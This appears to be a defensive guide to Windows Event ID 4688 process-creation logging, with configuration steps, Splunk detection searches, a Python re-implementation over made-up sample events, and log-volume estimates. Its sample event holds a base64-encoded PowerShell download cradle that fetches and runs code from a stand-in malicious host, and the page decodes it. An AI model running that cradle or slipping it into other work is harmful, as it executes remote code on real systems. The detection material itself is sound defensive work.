Event ID 4688 (A new process has been created) is one of the highest-value events in Windows security logging, but only when it is configured properly. Without command line logging it records the image path, the process and parent process IDs and the account that created the process, but not the arguments, so a benign "powershell.exe" and a "powershell.exe -EncodedCommand ..." look identical. With command line logging enabled it records the full command line including every argument. For investigation purposes the difference between the two states is enormous.
Configuration — two steps, both required
Step 1: Enable Audit Process Creation via Group Policy or local policy:
Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Detailed Tracking > Audit Process Creation: Success
Step 2: Enable command line logging via registry. This value is what the Group Policy setting Computer Configuration > Administrative Templates > System > Audit Process Creation > "Include command line in process creation events" writes; on domain-joined hosts prefer the policy so the setting is enforced rather than set once by hand:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Command line logging needs Windows 8.1 / Server 2012 R2 or later, or KB3004375 on Windows 7 / Server 2008 R2 / 8 / Server 2012. One caveat before rolling it out: arguments that carry credentials (a password passed to net use, a database password on a scripted client's command line) now land in the Security log and in the SIEM in clear text, so treat the log, its forwarding path and its consumers as sensitive data.
Verify both are active:
auditpol /get /subcategory:"Process Creation"
# Process Creation                        Success
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled
#     ProcessCreationIncludeCmdLine_Enabled    REG_DWORD    0x1
Then start any process (cmd /c whoami is enough) and confirm that the resulting 4688 in the Security log has a populated Process Command Line field; that is the only check that exercises the whole chain end to end.
What a 4688 event looks like with command line logging enabled
Log Name:      Security
Event ID:      4688
Task:          Process Creation

New Process Information:
    New Process ID:        0x1a4c
    New Process Name:      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Token Elevation Type:  TokenElevationTypeFull (2)
    Mandatory Label:       High Mandatory Level
    Creator Process Name:  C:\Windows\System32\cmd.exe
    Creator Process ID:    0x0f20
    Process Command Line:  powershell.exe -NonInteractive -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=
Decoding the base64:
echo "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=" \
| base64 -d | iconv -f utf-16le -t utf-8
# IEX (New-Object Net.WebClient).DownloadString('https://malicious.example/payload')
Detection patterns in Splunk
Suspicious encoded PowerShell. PowerShell accepts -EncodedCommand, -ec, -e and any unambiguous prefix such as -enc, so a search that only looks for "-enc" misses the short forms:
index=wineventlog EventCode=4688
    (Process_Command_Line="*-EncodedCommand*" OR Process_Command_Line="* -enc *"
     OR Process_Command_Line="* -ec *" OR Process_Command_Line="* -e *")
| rex field=Process_Command_Line "(?i)\s-e(?:c|n[a-z]{0,12})?\s+(?<encoded>[A-Za-z0-9+/=]+)"
| table _time, host, New_Process_Name, Process_Command_Line, encoded
The encoded field is base64 of UTF-16LE text, and core Splunk eval has no base64 function, so decode it with an add-on that provides one (and read the bytes that come out as UTF-16LE, or you will see NUL-interleaved characters) or out of band with the shell pipeline above.
Net commands used for domain reconnaissance (group the OR terms explicitly so the process-name and command-line conditions are both required):
index=wineventlog EventCode=4688
    (New_Process_Name="*\net.exe" OR New_Process_Name="*\net1.exe")
    (Process_Command_Line="* user *" OR Process_Command_Line="* group *" OR Process_Command_Line="* localgroup *")
| stats count by host, Account_Name, Process_Command_Line
| sort -count
net.exe hands most subcommands to net1.exe, so a single "net group" typed by a user produces two 4688 events with the same command line; expect counts in pairs or dedup on Process_Command_Line before alerting on volume.
WMI spawning child processes (lateral movement indicator):
index=wineventlog EventCode=4688
Creator_Process_Name IN ("*\WmiPrvSE.exe", "*\wmiprvse.exe")
NOT New_Process_Name IN ("*\WmiPrvSE.exe", "*\conhost.exe")
| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line
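The decoding step and the three Splunk detections above, re-implemented as plain Python over a handful of constructed 4688 records so the logic can be exercised offline against the page's own encoded payload. This is an added example, not code from the original page: the hostnames, accounts and paths in the sample events are made up, and the requirement that the encoded-command rule fire only for powershell.exe or pwsh.exe is a tightening that the Splunk search does not have.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Added example (not the page's own code): the three detections and the
# -EncodedCommand decode from the text, as plain Python over constructed 4688
# records. Field names mirror the Splunk fields used in the searches.


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    account_name: str
    creator_process_name: str
    new_process_name: str
    process_command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


# The encoded payload shown in the sample event above (base64 of UTF-16LE text).
ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMA"
    "aQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA="
)

# PowerShell accepts -EncodedCommand, -ec, -e and any unambiguous prefix such as
# -enc, so a literal "-enc " wildcard misses the short forms. The blob is the next
# whitespace-delimited token. "-ex"/"-ep" (ExecutionPolicy) do not match.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]{0,12})?\s+([A-Za-z0-9+/=]+)")

# "net user", "net group", "net localgroup" as the first argument after the exe.
NET_RECON = re.compile(r"(?i)^\S+\s+(user|group|localgroup)\b")


def basename(path: str) -> str:
    """Lower-cased last path component, what the "*\\name.exe" wildcards match."""
    return path.rsplit("\\", 1)[-1].lower()


def extract_encoded_blob(command_line: str):
    """Return the base64 argument of -EncodedCommand (or an abbreviation), else None."""
    m = ENC_FLAG.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(blob: str):
    """Decode an -EncodedCommand blob; None if it is not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell encodes the script as UTF-16LE, which is why a bare base64
    # decode shows NUL-interleaved text (the iconv step in the shell pipeline).
    return raw.decode("utf-16-le", errors="replace")


def detect(ev: ProcessEvent) -> list:
    """Apply the three detection patterns from the text to one 4688 record."""
    findings = []
    new_exe = basename(ev.new_process_name)
    creator = basename(ev.creator_process_name)

    # 1. Encoded PowerShell. Restricting to powershell.exe/pwsh.exe is a
    #    tightening of the Splunk search (assumption, not from the page).
    blob = extract_encoded_blob(ev.process_command_line)
    if blob is not None and new_exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(blob)
        detail = decoded if decoded is not None else "undecodable blob: " + blob[:32]
        findings.append(Finding(ev.host, "encoded_powershell", detail))

    # 2. net.exe / net1.exe enumerating users or groups.
    if new_exe in ("net.exe", "net1.exe") and NET_RECON.search(ev.process_command_line):
        findings.append(Finding(ev.host, "net_recon", ev.process_command_line))

    # 3. WmiPrvSE.exe spawning anything other than itself or conhost.exe.
    if creator == "wmiprvse.exe" and new_exe not in ("wmiprvse.exe", "conhost.exe"):
        findings.append(Finding(ev.host, "wmi_child_process", new_exe + ": " + ev.process_command_line))
    return findings


def run_detections(events) -> list:
    return [f for ev in events for f in detect(ev)]


# Constructed sample records (hosts, accounts and paths are made up for the example).
SAMPLE_EVENTS = [
    ProcessEvent("WS-0417", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NonInteractive -NoProfile -EncodedCommand " + ENCODED),
    ProcessEvent("WS-0417", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\net.exe", 'net  group "Domain Admins" /domain'),
    ProcessEvent("SRV-APP02", "CORP\\svc-mon", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami > C:\\Windows\\Temp\\w.txt"),
    ProcessEvent("SRV-APP02", "CORP\\svc-mon", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\System32\conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0x4"),
    ProcessEvent("WS-0417", "CORP\\jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe", "notepad.exe C:\\Users\\jdoe\\notes.txt"),
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"{f.host:10} {f.rule:20} {f.detail}")
```

Run as a script it prints one line per finding: the decoded IEX download cradle, the net group enumeration, and cmd.exe spawned under WmiPrvSE.exe; the conhost.exe child and the notepad launch produce nothing. The decoder returns None on malformed base64 instead of raising, so one garbled event cannot abort a batch, and the regex deliberately refuses "-ex"/"-ep" so ExecutionPolicy arguments are not mistaken for an encoded command.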
Storage volume estimate
An average enterprise workstation generates on the order of 200 process creation events per hour, about 4,800 a day. At roughly 15-25 MB of raw event log data per day per endpoint that works out to 3-5 KB per rendered 4688, a plausible planning figure once a command line is included (long script-host command lines push it higher). At 1,000 endpoints this is 15-25 GB/day of raw data. Note that the default 20 MB maximum size of the Security log on a workstation fills in about a day at this rate, so raise the maximum log size or forward events promptly, or the evidence will have rolled over by the time anyone looks for it.
In a SIEM with compression and indexing, budget approximately 5-8 GB/day at that scale. Servers, build agents and hosts running script-heavy scheduled tasks sit well above the workstation average, so measure a pilot group before sizing licences and retention. The cost is worth it: process creation logs are the single most consistently useful data source in incident investigations.